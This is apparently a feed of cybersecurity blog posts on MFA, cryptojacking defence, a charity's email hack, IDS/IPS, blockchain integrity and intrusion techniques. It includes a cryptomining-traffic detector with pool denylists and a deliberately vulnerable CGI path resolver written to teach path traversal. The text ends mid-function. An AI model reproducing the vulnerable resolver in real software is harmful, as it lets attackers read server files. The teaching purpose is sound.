
The post Changing the monolith—Part 1: Building alliances for a secure culture appeared first on Microsoft Security.

Why should enterprises invest in Multifactor Authentication?

Estimated reading time: 2 minutes

Most users of Google’s services are familiar with the fact that the technology giant asks for a recovery phone number as an additional layer of protection for authentication. But is this additional layer actually effective?

Google did a study and got definite answers. Partnering with researchers from New York University and the University of California, San Diego, Google measured how effective its account protections were. The results showed that merely adding a recovery phone number to a Google account blocked up to 100% of automated bots, 99% of bulk phishing attacks and 66% of targeted attacks.

The difference an additional layer of protection makes

This is a good illustration of how an additional layer of authentication, applied at scale, can bolster enterprise cybersecurity.

Commonly known as Multifactor Authentication, the concept is simple: instead of presenting a single proof of identity for system access (typically a password), the user must present two or more proofs drawn from different categories:

  • Something only the user knows, such as a password or PIN
  • Something only the user possesses, such as a phone, hardware token or smart card
  • Something the user is, such as a fingerprint or face

For an everyday example of Multifactor Authentication, consider withdrawing money at an ATM: the withdrawal succeeds only if the user has both the bank card (possession) and the PIN (knowledge). Another example is logging in to a banking website, where the user must enter a password along with a One-Time Password (OTP) generated at the moment of log-in by an authenticator app or sent to a registered device.

Global authentication

Multifactor Authentication adds a layer of security to user accounts that makes it far harder for cybercriminals to get into an enterprise network with a stolen password alone. The Payment Card Industry Data Security Standard (PCI DSS) requires it for administrative and remote access to the cardholder data environment, and electronic payments in the European Economic Area require strong customer authentication under the EU’s revised Payment Services Directive (PSD2).

While it has been established that the biggest advantage of Multifactor Authentication is enhanced security, there are other advantages as well such as –

Damage Limitation

With Multifactor Authentication in place, a leaked or phished password, or a successful impersonation of a user, is no longer enough on its own to reach the data an attacker wants. That buys the IT team time to detect the compromise, reset the credential and investigate before any damage is done.

Better Productivity & Security

Multifactor Authentication enables enterprises to allow employees to be more flexible regarding using their own devices for work-related purposes. This can drive productivity and help overall efficiency.

Immediate Notifications

Multifactor Authentication also produces an early warning: a run of incorrect OTPs against one account, or prompts that the legitimate user did not initiate, signals that the first factor has probably already been compromised. These events can be forwarded immediately to administrators so the account is locked and the password reset before the attacker gets any further.

Prevent Data Breaches

Data breaches can prove costly; according to a recent study, the average total cost was $3.92 million. Multifactor Authentication can help prevent data breaches leading to substantial cost savings for the enterprise.

Recognizing its importance, Seqrite offers Multifactor Authentication across its products and services. The Endpoint Security solution offered by Seqrite evaluates and mitigates risks associated with any fraudulent transactions.

The post Why should enterprises invest in Multifactor Authentication? appeared first on Seqrite Blog.

Defending businesses from the perils of Cryptojacking

Estimated reading time: 2 minutes

The last few years have given rise to a new and dangerous cyberthreat known as cryptojacking. It is unlike typical malware: it demands no ransom, steals no data and does not cripple enterprise systems outright; instead it quietly consumes the victim’s processing power and electricity to mine cryptocurrency for the attacker. We introduced the subject earlier and are revisiting it here with a few additional pointers.

Enterprises should take this threat very seriously!

Increase in Cryptojacking attacks

In 2018, an Economic Times report observed that hackers were mining a fortune by running cryptocurrency scripts on Indian government websites, including the director of municipal administration of Andhra Pradesh, Tirupati Municipal Corporation and Macherla municipality. Seqrite’s Threat Report Q2 2019 also detected 19k cryptojacking attacks as against 17K in Q1, 2019 illustrating how this threat is seeing a rapid upsurge.

Since we already shared insights on the functionality of cryptojacking, here is some information on why cryptojacking is getting popular among the hacker community.

Why is Cryptojacking popular?

Less risk! Hackers love Cryptojacking because it is way less risky than planting ransomware in enterprise systems. In businesses worldwide, awareness of ransomware has grown. Hence, stakeholders are applying better and advanced solutions to protect against the same. This is not the same with Cryptojacking as this technique of infecting business machines is new.

While attackers may convince, say, 4 or 5 businesses out of the 100 they hit with ransomware to pay, with cryptojacking every one of the 100 infected machines works at full capacity to mine cryptocurrency for them. The technique is also simple and does not require deep technical skill: cryptojacking kits can be bought on the dark web for as little as $30.

For enterprises, cryptojacking attacks can lead to server outages and high costs of consumption. To prevent these attacks, they need to take the below-mentioned measures –

Ensure endpoint protection can detect these threats

As this threat grows, it is important for enterprises to keep the endpoint protection they use up to date so that it can detect and block miners. As with every other class of threat, the methods change constantly, but an updated security solution, such as Seqrite’s Endpoint Security, can detect and prevent cryptojacking attacks.

Browser protection is key

Cryptojacking reaches endpoints in two ways: by tricking users into clicking links that install a miner on the machine, or by planting a mining script in a web page or advertisement that runs inside the browser for as long as the tab stays open, with nothing installed at all. The defence is to make sure browsers across the enterprise have protection that blocks such scripts from running, and to watch for the tell-tale symptoms of sustained high CPU load and fan noise on otherwise idle machines.

Use web filtering to block suspicious websites

Along with browser protection, enterprises should go one step further and use their web filtering solution to block access to websites suspected of malicious activity such as cryptojacking, including the mining pools and proxy domains that the scripts connect back to.
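As an added example that is not part of the original post or any Seqrite product, the following script shows what a web-filtering or network-monitoring check for the "connect back to a pool" step can look like. Miners, whether installed binaries or in-browser scripts going through a WebSocket proxy, talk to their pool with Stratum, a small JSON-RPC dialect whose first message is a `mining.subscribe`/`mining.authorize` (Bitcoin-style pools) or a `login` (Monero-style pools, the kind browser miners use). The script parses constructed flow records of the form `timestamp|source|destination host|port|first payload bytes`, flags Stratum handshakes, denylisted hosts and common pool ports, and grades each finding. The denylist entries, the flow-record format and the sample lines are all constructed for this example; the port list is a heuristic, and once a pool connection is wrapped in TLS only the host, port and the machine's CPU telemetry remain as signals.

```python
import json
from typing import Dict, List, Optional

# Stratum / pool JSON-RPC methods seen at the start of a mining session.
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty",          # Bitcoin-style Stratum
    "login", "submit", "keepalived",                   # Monero-style pools (used by XMRig and browser miners)
}
# Ports pools commonly listen on. A hint only, never proof on its own.
POOL_PORTS = {3333, 4444, 5555, 7777, 8888, 14444, 45700}
# Web-filter denylist. Hypothetical hosts constructed for this example.
DENYLIST = {"pool.example-miner.test", "cdn.example-miner.test"}


def stratum_method(payload: str) -> Optional[str]:
    """Return the pool-protocol method if the payload looks like the start of a mining exchange."""
    if not payload.startswith("{"):
        return None
    try:
        msg = json.loads(payload)
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None
    method = msg.get("method")
    if method in STRATUM_METHODS:
        return method
    result = msg.get("result")
    if isinstance(result, dict) and "job" in result:   # pool's login reply carrying the first job
        return "job-reply"
    return None


def analyse_flow(line: str) -> Optional[Dict]:
    """Grade one 'ts|src|host|port|payload' record; None when nothing is suspicious."""
    ts, src, host, port, payload = line.split("|", 4)
    reasons: List[str] = []
    method = stratum_method(payload)
    if method:
        reasons.append("stratum:" + method)
    if host in DENYLIST:
        reasons.append("denylist:" + host)
    if int(port) in POOL_PORTS:
        reasons.append("port:" + port)
    if not reasons:
        return None
    # Protocol evidence or a denylisted host is conclusive; a port match alone is only a lead.
    severity = "high" if any(r.startswith(("stratum:", "denylist:")) for r in reasons) else "low"
    return {"ts": ts, "src": src, "host": host, "severity": severity, "reasons": reasons}


def scan_flows(lines: List[str]) -> List[Dict]:
    return [finding for finding in map(analyse_flow, lines) if finding]


# Constructed sample records; the wallet in the first one is a placeholder, not a real address.
SAMPLE_LOG = [
    '2019-12-20T10:01:02Z|10.0.0.15|pool.example-miner.test|3333|'
    '{"id":1,"method":"login","params":{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/5.5.0"}}',
    '2019-12-20T10:01:03Z|10.0.0.22|www.example.com|443|',
    '2019-12-20T10:02:10Z|10.0.0.31|198.51.100.7|14444|'
    '{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.0"]}',
    '2019-12-20T10:03:00Z|10.0.0.40|intranet.example.com|8888|GET /api HTTP/1.1',
]

if __name__ == "__main__":
    for finding in scan_flows(SAMPLE_LOG):
        print(finding["severity"], finding["src"], "->", finding["host"], finding["reasons"])
```

Feeding the `high` findings to the web filter as new denylist entries, and the `low` ones to a ticket for a CPU-usage check on the source machine, is the practical loop this section describes: the protocol signature catches pools the filter has never heard of, and the filter then stops the rest of the fleet from reaching them.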

A strong MDM solution is important

Mobile Device Management (MDM) solutions like the Seqrite mSuite can prevent mobile devices from being infected by cryptojacking software offering cybersecurity for businesses that are also on-the-go.

Seqrite’s Unified Threat Management (UTM) solution offers ease of use and brings key security features such as network security, management, backup and recovery of data and other critical network services together under a single unified umbrella, preventing cryptojacking attacks at the source.

The post Defending businesses from the perils of Cryptojacking appeared first on Seqrite Blog.

Special Olympics New York Hacked to Send Phishing Emails

Special Olympics New York, a non-profit organization serving athletes with intellectual disabilities, has been compromised.

Special Olympics New York gives people with intellectual disabilities an equal opportunity to take part in competitive, organized sports.

Sadly, during the Christmas holiday, the non-profit’s email system was compromised and the perpetrators used it to launch a phishing campaign against its donors.

“Friends, Boo! As you may have noticed, our email server was temporarily hacked. We have fixed the problem and send our sincerest apologies. While donating to Special Olympics NY is always a good idea, we would never ask in such a grinchy way.” wrote Stacey Hengsterman, President & CEO of Special Olympics NY, in a post published on Instagram.

“We immediately heard from so many of you and for that we are grateful.
We are sorry for the inconvenience and hope you are all enjoying your holiday season!”

The organization reported the intrusion, confirmed that the perpetrators had been locked out, and sent a data breach notice to the affected people asking them to disregard the fraudulent message.

Casey Vattimo, SVP of Public Affairs for Special Olympics NY, disclosed the breach on Twitter and reported that the situation had been contained.

Hack

Special Olympics New York stated that the intrusion only compromised its “communications system”, which holds supporters’ contact information, and pointed out that no financial data was exposed.

The phishing messages told donors of an upcoming contribution fee that would automatically deduct $1,942.49 from the recipient’s account within two hours.

The manufactured urgency was meant to make victims click one of the two embedded hyperlinks, which supposedly led to a PDF version of the transaction statement.

“Please review and confirm that all is correct, if you have any questions, please find my office ext number in the statement and call me back,” read the content of the phishing emails. “It is not a mistake, i verified all twice. Thank you, have a great weekend.”

The phishing email used a Constant Contact tracking link to redirect users to a website built to steal donors’ credit card details.

Casey Vattimo noted that donors can now give without any complications, adding that all donations made to Special Olympics NY by December 31 will be matched, courtesy of Finish Line.

The post Special Olympics New York Hacked to Send Phishing Emails appeared first on .

Managing cybersecurity in multimedia networks

Estimated reading time: 2 minutes

The explosion of internet speeds across the globe has led to a rapid increase in high-end streaming technology, wireless sensor networks and wearable Internet of Things (IoT) devices. Multimedia networks generate huge amounts of data flowing through many devices in different locations, while also raising important questions about data ownership, copyright and protection. Cybersecurity has become an essential component of any multimedia network that wants to tackle these issues.

The urgency is precipitated by the condition of organizations which operate in this sector. A survey of cybersecurity decision-makers at US media and entertainment firms by Forrester Consulting in September 2018 found that more than half of the surveyed firms had experienced three or more cyber attacks. In April 2015, a cyberattack on renowned French international TV broadcaster TV5 Monde took 12 channels belonging to the broadcaster off the air.

Considering multimedia networks deal with the dissemination of large amounts of content in video, audio, image and other formats, these networks are open to various types of threats which target three major features of these networks:

Confidentiality

Confidentiality is an important feature of data in multimedia networks. Access to confidential data through illegal means or unauthorized channels constitutes a major threat.

Integrity

The integrity of the data carried by multimedia networks is paramount. Unauthorized alteration of this data, whether or not it is detected, represents a major breach.

Availability

The end-users of multimedia networks expect the data they seek to be available at all times. Any disruption to this service has both a reputational and a financial consequence.

The exact kinds of threats that multimedia networks face are varied but they definitely include:

Distributed Denial of Service (DDoS) attacks

Multimedia networks are large & distributed and transmit huge amounts of data. Attackers specifically target such networks with Distributed Denial of Service (DDoS) attacks as the repercussions are immediate.

Patching vulnerabilities

Multimedia networks consist of many devices distributed mainly over different continents and countries. Such a large network means it is not always possible to ensure all devices are compliant with the recent security updates, opening up the network to vulnerabilities.

Supply chain attacks

As alluded to in the last point, multimedia networks generally have large supply chains whose members may not all uphold the same standards of cybersecurity. Malware introduced anywhere in the supply chain can spread to the main network and put it at risk.

Social engineering

Though awareness has increased, multimedia networks are often operated by employees who do not take cybersecurity seriously or do not understand the consequences of neglecting it. Such employees are at high risk of social engineering attacks.

To protect against these threats, enterprises running multimedia networks can consider Seqrite’s Unified Threat Management (UTM) solution which is a complete security package of vital tools, including a UTM firewall and high-grade intrusion detection systems.

Key UTM features which keep networks safe from threats:

  • Firewall – Administrators can block traffic between internal and external networks based on compliance policies
  • Intrusion Prevention System (IPS) – Network traffic is scrutinized in real-time to forestall a broad range of DoS and DDoS attacks
  • Gateway Antivirus – Incoming and outgoing network traffic is scanned at the gateway level
  • Web Filtering – Non-business related web traffic can be blocked by administrators with the option of group-based bandwidth management

The post Managing cybersecurity in multimedia networks appeared first on Seqrite Blog.

How can blockchain enable better data security for enterprises?

Estimated reading time: 2 minutes

NASA recently announced a proposal to explore the possibility of using blockchain to improve the cybersecurity of its current air traffic management systems. It was a powerful statement from one of the world’s most well-known organizations and a strong endorsement of blockchain which has the potential to change how business is conducted, worldwide.

To understand its power, it is important to understand what a blockchain actually is: an append-only ledger whose records are grouped into blocks, each of which carries the cryptographic hash of the block before it, so that the blocks form a chain. Every participating node holds a full copy, and transactions are validated and confirmed by the network rather than by a single operator. On public blockchains participants are pseudonymous rather than anonymous: the ledger itself is readable by everyone.

Decentralization for greater security

A key differentiating point about blockchain is that it is distributed and exists on many systems at the same time. Importantly, information once entered cannot be quietly altered. Each user holds a private, cryptographically generated key, but its role is to sign the transactions that user submits, not to hide blocks from others; the ledger stays readable by all participants. What prevents manipulation is the chaining: altering any block changes its hash and breaks the link in every block after it, and the other nodes, which hold their own copies, reject the inconsistent version.

It is this decentralization that could change cybersecurity. The principle of blockchain technology is that there is no central authority or single storage location; in conventional information systems, attackers target exactly that central system to inflict maximum damage. Instead, each transaction is cryptographically verified by the network as a whole. A vulnerability in one node therefore does not put the entire database at risk, because the same data is held and checked on many other nodes, unlike a conventional setup.

Benefits of blockchain technology

While research into blockchain continues, more and more companies are exploring how blockchain could benefit their enterprise security. Two key ways are:

Greater resilience to DDoS attacks

Distributed denial of service (DDoS) attacks flood a server with traffic from many compromised machines at once until it is overwhelmed and stops responding. The decentralization at the heart of blockchain technology removes the single point of failure that such attacks rely on: the ledger is replicated across a large number of nodes, so knocking out any one of them does not take the service down. The caveat is that an enterprise’s own applications, APIs and the nodes it operates can still be flooded, so this resilience applies to the ledger itself rather than to everything built on top of it.

Better data protection

Enterprises have to be much more careful about the way they handle customer data considering the new wave of data protection laws across the world. Blockchain technology could offer better protection of data integrity thanks to its inbuilt mechanisms: every record is hash-linked to the one before it, transactions are signed with the submitter’s private key, and each node holds a copy of the entire chain that is synchronized as new blocks are appended. Hence any attempt to delete data or insert false data breaks the chain of hashes on the tampering node, and its copy no longer matches the copies held by the other nodes, so the attempt is detected immediately.
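As an added example, not code from the original post or from any blockchain project, the following Python builds the hash-linked ledger the two paragraphs above describe and shows both halves of the detection argument. Each block carries the SHA-256 hash of its own contents and the hash of its predecessor, so editing a past record is caught the moment any node re-verifies its copy. It also shows the caveat: an attacker who controls a single node can recompute every later hash and make that one copy verify cleanly, which is why detection ultimately rests on comparing replicas across independent nodes, not on hashing alone. The block layout, field names and the sample transactions are assumptions constructed for the example; there is no consensus protocol here, only the integrity check.

```python
import copy
import hashlib
import json
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Block:
    index: int
    timestamp: int
    data: dict          # the transaction(s) recorded in this block (constructed format)
    prev_hash: str      # hash of the previous block: this is the "chain"
    hash: str = ""


def block_hash(b: Block) -> str:
    """SHA-256 over the canonical JSON of everything except the hash field itself."""
    payload = json.dumps(
        {"index": b.index, "timestamp": b.timestamp, "data": b.data, "prev_hash": b.prev_hash},
        sort_keys=True, separators=(",", ":"),
    )
    return hashlib.sha256(payload.encode()).hexdigest()


def new_chain() -> List[Block]:
    genesis = Block(0, 0, {"note": "genesis"}, "0" * 64)
    genesis.hash = block_hash(genesis)
    return [genesis]


def append_block(chain: List[Block], timestamp: int, data: dict) -> Block:
    prev = chain[-1]
    b = Block(prev.index + 1, timestamp, data, prev.hash)
    b.hash = block_hash(b)
    chain.append(b)
    return b


def verify_chain(chain: List[Block]) -> Tuple[bool, Optional[int]]:
    """Recompute every hash and every link; return (ok, index of the first bad block)."""
    for i, b in enumerate(chain):
        if b.hash != block_hash(b):
            return False, i
        if i > 0 and b.prev_hash != chain[i - 1].hash:
            return False, i
    return True, None


def rehash_from(chain: List[Block], start: int) -> None:
    """What an attacker holding one node does after editing block `start`: rebuild all later links."""
    for i in range(start, len(chain)):
        if i > 0:
            chain[i].prev_hash = chain[i - 1].hash
        chain[i].hash = block_hash(chain[i])


def heads_agree(replicas: List[List[Block]]) -> bool:
    """Cross-node check: every replica must report the same head hash."""
    return len({replica[-1].hash for replica in replicas}) == 1


def demo() -> Tuple[Tuple[bool, Optional[int]], Tuple[bool, Optional[int]], bool]:
    honest = new_chain()
    append_block(honest, 1577836800, {"from": "alice", "to": "bob", "amount": 5})
    append_block(honest, 1577836860, {"from": "bob", "to": "carol", "amount": 2})

    tampered = copy.deepcopy(honest)         # a second node's copy, which the attacker controls
    tampered[1].data["amount"] = 500         # rewrite history
    after_edit = verify_chain(tampered)      # the edit breaks block 1's hash: (False, 1)

    rehash_from(tampered, 1)                 # attacker re-links the chain on his own node
    after_rehash = verify_chain(tampered)    # that single copy now verifies: (True, None)

    # ...but its head no longer matches the honest replica, so the network rejects it.
    return after_edit, after_rehash, heads_agree([honest, tampered])


if __name__ == "__main__":
    print(demo())
```

The practical reading: integrity of a lone copy is cheap to verify and cheap to fake, so the security property enterprises are buying comes from replication across nodes they do not all control. A private blockchain run entirely on one organization’s servers gives up most of that benefit.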

With many companies exploring the power of blockchain for cybersecurity and other functions, it is quite clear that the technology has a long future. Enterprises must continue to explore ways in which they can unlock the power of blockchain to enable greater cybersecurity.

The post How can blockchain enable better data security for enterprises? appeared first on Seqrite Blog.

Too Much Holiday Cheer? Here’s Something to Fear: Cybersecurity Predictions for 2020

2019 is virtually over and a new year beckons with all the solemnity of the grim reaper for those who don’t have their eyes wide open to the persistent threats we collectively face in the areas of privacy and cybersecurity. 

Now that I have your attention, I’d like to add that it’s not all bad news. In the main, consumers and business leaders alike are more aware of cybersecurity and privacy than ever before. However, this sea change has been met with innovation on the criminal side of things. As defenses improve, the attack vectors become more nuanced and technically impressive. At times it can seem like a war of attrition, which brings us to the first series of predictions for 2020:

  1. CISOs will get worse at their jobs. Okay, simmer down all you cybersecurity people. I just mean there will be a shortage of experts–i.e., fewer of you to go around because at this moment in history everyone understands that a good CISO is critical to the ongoing success of an enterprise (the 2019 IBM Cost of Data Breach study found that the average cost to an organization was $3.92 million). With the demand for cybersecurity professionals far exceeding supply, the market will start having openings for less qualified people. Water finds its level, but it will be rough for a while. 
  2. The disinformation blob will grow. With what we experienced in 2016 and 2018, is there any doubt there will be a rise in disinformation–homegrown and imported–of all stripes in the upcoming elections? Since these weaponized misinformation campaigns have proven effective, expect to see more of them in the private sector, with businesses adopting troll farm tricks to hurt the competition–or rather waiting to be discovered by intrepid reporters like Brian Krebs.
  3. Ransomware will continue to thrive. As long as humans are, well... human, phishing attacks will lead to ransomware infecting more and more networks, and businesses, municipalities and other organizations will continue to pay whatever they must in order to regain control of their data and systems. We will also see better backup practices that will help minimize or neutralize the threat of these attacks.
  4. IoT botnets will make dystopian paranoia seem normal. IoT will continue to grow exponentially. In 2020 there will be somewhere around 20 billion IoT devices in use around the world. Unfortunately, many are not secure because they are protected by nothing more than manufacturer default passwords readily available online. They will be weaponized (as in years past) but with increasing skill and computing power.
  5. The integrity of the US elections will be questioned–and for good reason. There are still voting machines in use that are far from secure, and would not pass the most simple audits. Some states continue to use machines that leave no paper trail. Look forward to questions regarding election security all year. 
  6. Cryptocurrency miners will continue to get rich off of stolen electricity. Related to the botnet craze, we will see an increase in computing power theft used to mine cryptocurrency. With bots becoming exponentially more effective as the result of AI and cloud computing, we will see a renaissance of Wild West behavior in the world’s cryptomines.  
  7. Zero trust environments will be talked about. A few may exist. The assumption that one can trust the home team–people within one’s organization–sort of went the way of the Dodo bird when Edward Snowden walked away from the NSA carrying a treasure trove of NSA data hidden in a Rubik’s Cube. Zero trust simply means that no one can be trusted, in or outside the organization. With this assumption foremost, new systems make breaches and compromises harder to happen. Stay tuned.
  8. More people will know what “protect surface” means. Protect surface is part of the zero-trust environment. An organization’s attackable surface includes every error-prone human in its employ as well as the mistakes in configuration they may have committed along the way and a whole constellation of other issues. The protect surface is much smaller and must be kept out of harm’s way. The more we talk about subjects like protect surface, the stronger our cybersecurity will be.
  9. Cars will be frozen. Or not. But actually, yes. I think it will happen. Driverless cars are going to hit things as well as get hit. Cars that talk to satellites are toast. It’s going to happen. (Or not. But it totally could.)
  10. 5G will make the cyber smash-and-grab a thing. 5G is going to make everything move fast, as will the new generation of USB4 devices. With quicker speeds, it will take much less time to transfer data. Coincidentally, criminals appreciate this as much as the rest of us.
  11. Social media will no longer need to be private. Social media companies will probably become a bit more responsible when it comes to the way they gather, store, crunch, analyze and sell our data to marketing companies and small to medium sized businesses looking to connect directly with consumers. This is really not worth talking about, however, because all of our information has already been scooped up. It’s good news for 2020 babies. 
  12. State-sponsored traffic jams will be a thing. The hackers who brought you Hillary’s emails and who probably have President Trump’s tax returns are going to target operational systems with an array of tactics that include ransomware and more DDoS attacks that will snarl things up in ways we’ve not yet seen. The targets will be financial institutions, the power grid, an election, a company’s secret sauce, a city’s traffic lights or, you can fill in the blank.
  13. You’re going to have personal cyber insurance. Insurance companies will be writing more comprehensive cyber liability policies for businesses and offering innovative personal cyber coverage for consumers.
  14. HR will save money by spending some. More employers will offer their employees identity protection products and services as part of their paid or voluntary benefits programs. (An employee who has their identity stolen is not very productive and if, as part of that identity theft, their USER ID or passwords are exposed, a thief might have what he or she needs to access an employer’s network and sensitive databases.)
  15. The cloud will leak. The parade of stories about misconfigured cloud clients and data stored without any password protection on cloud services will continue apace, perhaps in part because of the CISO issue discussed in the first prediction. 
  16. AI will gladly take your job. The Yang Gang knows it’s true. AI is here and it’s willing to work so that you can go fishing, collect that monthly $1,000 and not make ends meet. In all seriousness, the CISO shortage as well as many of the innovations discussed in this list of predictions will be increasingly powered by Artificial Intelligence. 

2020 promises to be an interesting ride. Buckle up, because that driverless car might be hacked along the way. As ever, you are your best guardian when it comes to your privacy and personal cybersecurity. Be smart. Stay safe. And, have a very happy, healthy holiday season. 

The post Too Much Holiday Cheer? Here’s Something to Fear: Cybersecurity Predictions for 2020 appeared first on Adam Levin.

Black Hat Hackers & White Hat Hackers – The Sequel

Estimated reading time: 2 minutes

Thanks to popular culture, the image of a hacker has often become stereotypical, which is ‘criminals using advanced cyber techniques to infiltrate enterprises or systems, with the intention to cause mayhem.’ It’s an image carefully cultivated by movies and books to the extent that many people may not be aware that there is actually more to the popular stereotype.

At its most basic, hacking is referred to as the bypassing of security measures to enter a computer device or network. The individuals who do this are called hackers —  however, all hackers are not cybercriminals.

Sometimes, organizations may even reward hackers to infiltrate their systems.

Surprised? Read on as we add on to our previous blog on the same topic.

The White Hat hacker

The white-hat hacker is a form of an external audit used and even favoured by many organizations. Thanks to their specialized knowledge of breaking into systems, white hat hackers could well be intricately aware of the flaws present inside an enterprise’s cybersecurity posture, perhaps more so than even the security teams. Since white hat hackers do what they do for a living, they can spot vulnerabilities and loopholes in systems which may not be visible within the organization.

White hat hackers are employed by many different organizations across the world to test their security defences. Seqrite offers Red Team Assessments as a service, which are mock trials of how well an enterprise’s people, processes and technology hold up to cyberattacks which are conducted by highly trained security professionals who attempt to breach an organization. Red Team Assessments were recently recommended by the Reserve Bank of India (RBI), India’s central banking institution,  who endorsed the use of such kind of assessments for financial institutions.

The major difference between white hat and black hat hackers is that the former enter an organization’s systems with its full consent and knowledge, under an agreed scope. White hat hackers are not motivated by malice but by a genuine desire to help enterprises iron out their cybersecurity flaws.

The Black Hat hacker

The black hat hacker is the cybercriminal that enterprises worry about — like white hat hackers, they are professionals with an in-depth knowledge of how to identify loopholes in an organization’s cybersecurity framework and use these to penetrate & attack. Unlike white hat hackers, they aren’t motivated by any good intentions but by malice.

Black hat hackers are cybercriminals because their motives for attacking businesses are malicious. Those motives range from stealing confidential data and selling it on the dark web to simply creating chaos within an organization. In many cases even script kiddies, who may have little experience, use off-the-shelf tools to conduct attacks or run Distributed Denial of Service (DDoS) attacks to bring an organization to its knees.

Enterprises know that the key to dealing with black hat hackers is to maintain a strong security solution that closes known vulnerabilities and calls out suspicious user behaviour when it happens. Seqrite offers a range of security solutions for an enterprise, assuring powerful protection against hackers and other threats. Whether it is endpoint security or an integrated threat management solution for the network, enterprises can depend on Seqrite for their cybersecurity protection.

The post Black Hat Hackers & White Hat Hackers – The Sequel appeared first on Seqrite Blog.

The Best Templates for Posting Cybersecurity Jobs

The cybersecurity of a company is heavily reliant upon the skills and knowledge of the people who install, manage, and operate its security products. This means that recruiting and nurturing the best security team possible should be a CISO's top priority. Cynet's Ultimate Cybersecurity Job Posting Templates (download here) provide a list of the main responsibilities and skills for typical

How do Intrusion Detection/Prevention Systems work?

Estimated reading time: 3 minutes

Enterprises mainly use two types of systems to deal with network intrusions – Intrusion Detection System (IDS) and Intrusion Prevention System (IPS). While the two systems are primarily similar, it is important to understand the major aspects which distinguish them.

Intrusion Detection Systems (IDS) monitor and analyse events on the network to detect possible incidents of trespassing or violations of security policy. This is mainly a reactive process: all incoming and outgoing network activity is monitored, and any sign of an intrusion that could jeopardize the business is flagged. Because its main function is to raise an alert when it discovers such activity, rather than to block it, an IDS is commonly known as a passive monitoring system.

IDS uses the following techniques to detect attacks –

Signature-Based Detection

With this method, the IDS compares observed events against a database of patterns (signatures) that correspond to known attacks and raises an alert on a match. For example, an IDS would flag an email with a subject line like ‘Free pics’ if that subject matches a known malware signature. Signature-based detection is effective against attacks for which a signature already exists, but it cannot detect novel attacks or variants whose signature is not yet in the database.

Anomaly-Based Detection

With anomaly-based detection, the IDS compares network activity against a profile of normal activity and flags deviations from that profile. For example, the IDS would raise an incident when it observes a volume of data flowing across the network that is considerably higher than the normal pattern. The profile must be kept continuously up to date, because legitimate changes in network usage that are not reflected in it show up as false positives.

Intrusion Prevention Systems (IPS) are a step forward from IDS in terms of capabilities. Where an IDS is a reactive mechanism, an IPS is proactive: it goes one step beyond detection and actively tries to stop the detected threat from succeeding. It is an active, in-line control that monitors the network traffic flow, identifying and averting vulnerability exploits in the form of malicious inputs that intruders use to disrupt or gain control of an application or system.

IPS technologies attempt to stop a detected attack from succeeding through some of the below actions:

Terminating network connection

The IPS can stop a detected attack by terminating the network connection being used for it and blocking the offending source’s further access to the target.

Automating security controls

On detecting an attack, or a vulnerability on a host, an IPS can attempt to limit the damage by applying preset automated controls, such as triggering patch deployment or reconfiguring firewall rules.

Attempt to make the attack benign

An IPS can attempt to render an attack harmless, for example by stripping a malicious attachment from an email before it is delivered.

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into your network and forestalls a broad range of DoS and DDoS attacks before they penetrate the network. Deploying this level of protection can benefit an enterprise in various ways, including:

  • Providing a snapshot of network security at one glance
  • Protection of enterprise assets within the network
  • Triggers raised on detection of any suspected breach or activity in the network
  • A holistic approach towards prevention of intrusions

The post How do Intrusion Detection/Prevention Systems work? appeared first on Seqrite Blog.

70% of Organizations Experienced Internal Data Breaches in the Last Five Years

Internal data breaches are on the rise, with 70% of security professionals reporting that it’s happened to them in the last five years.

According to a survey conducted by email security company Egress, accidental internal breaches are one of the top three concerns for IT security decision makers along with external hacks and malware.

Among the other findings in the report, fewer than 40% (39.6%) of organizations train employees in cybersecurity best practices and data hygiene, and 26% of respondents did not use encryption when transmitting data externally.

While e-mail applications are a leading cause of accidental breaches, file sharing services, collaboration tools, and SMS apps represent significant risks.

Respondents did indicate a new urgency with regard to compliance with privacy- and security-centric regulations such as the European Union’s General Data Protection Regulation and California’s pending Consumer Privacy Act.

The post 70% of Organizations Experienced Internal Data Breaches in the Last Five Years appeared first on Adam Levin.

What are the different techniques of intruding networks?

Estimated reading time: 2 minutes

Network performance is a key indicator of an enterprise’s productivity and health in these connected times. Every business needs to keep its network running smoothly; however, that is easier said than done. Enterprise networks are susceptible to unauthorized activity in the form of targeted intrusions through vulnerabilities and backdoors.

When such vulnerabilities are exploited, unauthorized access to the network follows, with a range of unpleasant consequences for the business, from heavy consumption of resources to loss of enterprise data.

Cybersecurity teams deployed by enterprises are required to proactively detect and respond to network intrusions. It is imperative that these teams have a detailed understanding of how network intrusions and other types of attacks occur so that detection and prevention systems can be set up with the same in mind.

This understanding begins with identifying the type of attack vector. Network intrusions happen through a variety of techniques some of which are –

Asymmetric Routing

In this method, attack traffic is sent to the target device over several different routes, so that no single sensor sees the whole exchange. Packets that travel along a path with no sensor reach their target without being detected.

Taking advantage of vulnerabilities in networks

In many cases networks are infiltrated through software that is already present, with attackers either exploiting its vulnerabilities or using stolen credentials. Since every enterprise runs commodity operating systems and applications, unpatched flaws in those products are a ready vector for infiltration.

Common Gateway Interface (CGI) scripts

Attackers can abuse Common Gateway Interface (CGI) scripts to read files on the server. CGI scripts are used to handle requests between Web clients and servers, but a script that does not validate its input can be manipulated into serving files that were never meant to be exposed to the Web.
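The file-access flaw described above comes down to how a script turns a request parameter into a filesystem path. The following is an added example, not code from the Seqrite post: a vulnerable resolver beside a hardened one, using an assumed document root (`/var/www/cgi-data`) and constructed request strings. It decodes the parameter before checking it, which is where many real CGI handlers go wrong.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the illustration (not a real deployment path).
DOC_ROOT = "/var/www/cgi-data"


def resolve_unchecked(doc_root, requested):
    """Vulnerable pattern: the user-supplied name is decoded and joined onto the
    document root with no further checks, so '..' segments or an absolute path
    walk straight out of the intended directory."""
    decoded = unquote(requested)
    return posixpath.normpath(posixpath.join(doc_root, decoded))


def resolve_checked(doc_root, requested):
    """Hardened pattern: decode first, then refuse NUL bytes and absolute paths,
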